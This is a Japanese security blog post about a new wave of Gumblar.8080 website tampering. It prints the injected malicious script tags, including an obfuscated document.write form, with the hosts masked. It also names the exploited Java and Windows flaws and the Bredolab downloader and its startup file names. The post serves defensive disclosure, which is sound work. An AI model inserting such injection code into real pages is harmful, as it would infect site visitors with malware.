|
先週書いたGumbalar.8080の新タイプな改ざんコードですが、今週になってから誘導先のURLアドレスに新たなものがどんどこ大量投入されました。 ぜーんぶ乗っ取られてしまった正規ドメインのURLアドレスっぽいので、ブラックリストタイプのURLブロック機能は対応されるまでの数日間はスルーしてしまう可能性が・・・。  改ざんされると、下のような不正なJavaScriptコードが挿入されます。 □ HTMLファイルの場合: ・位置はページの最後尾 <script type="text/javascript" src="http://●●.■■.▲▲:8080/***.js"></script> <!--(〜 30文字程度の英数字 〜)-->□ 外部JSファイルの場合: ・位置はファイルの最後尾 document.write('<s'+'cript type="text/javascript" src="http://●●.■■.▲▲▲:8080/***.js"></scr'+'ipt>');
・サイト改ざん被害・攻撃サイト判定の対処方法・Microsoft関連は、Windows XPに影響がある未修正ゼロデイ攻撃あり <26日追記> ・Java(JRE)は、2010年4月に修正された脆弱性を悪用する処理が含まれてます。(参考ページ) ・Adobe Reader(PDFファイル)は、最新版でも修正されてない脆弱性を悪用する処理(ゼロデイ状態)は今のとこ含まれてません。(参考ページ) 昨日24日にゲットしてきた不正なPDFファイルの解析結果: http://jsunpack.jeek.org/dec/go?report=d4f42df46ff348680c1322d6050e00b5c1b538a0 (※セキュリティソフトが警告する場合アリ) ● 強制的に発動するウイルス 脆弱性を悪用して最終的に強制発動する実行ファイルです。今日ゲットしてきたもの。Bredolabという名前のウイルスで、いろいろな別のウイルスを調達してきて感染させパソコンを乗っ取ります。 先週あたりに投入されたものみたいで検知率は大分高いでしょうか。
VirusTotalの結果: http://www.virustotal.com/jp/analisis/fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa-1277476491挙動を知るため、Comodoが提供してるマルウェア解析機に放り投げてみました。自分自身を「sisytj32.exe」というファイル名でスタートアップに登録して活動開始するようです。ちなみに、チョット前は「siszpe32.exe」というファイル名で、日本での感染報告がいくつかあがってます。 Comodo Instant Malware Analysisの結果: http://camas.comodo.com/cgi-bin/submit?file=fc89cfc9ff5ff9dda2e83d96d95d8fd8e13c3634f31f445e870e366feaa7edaa |
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
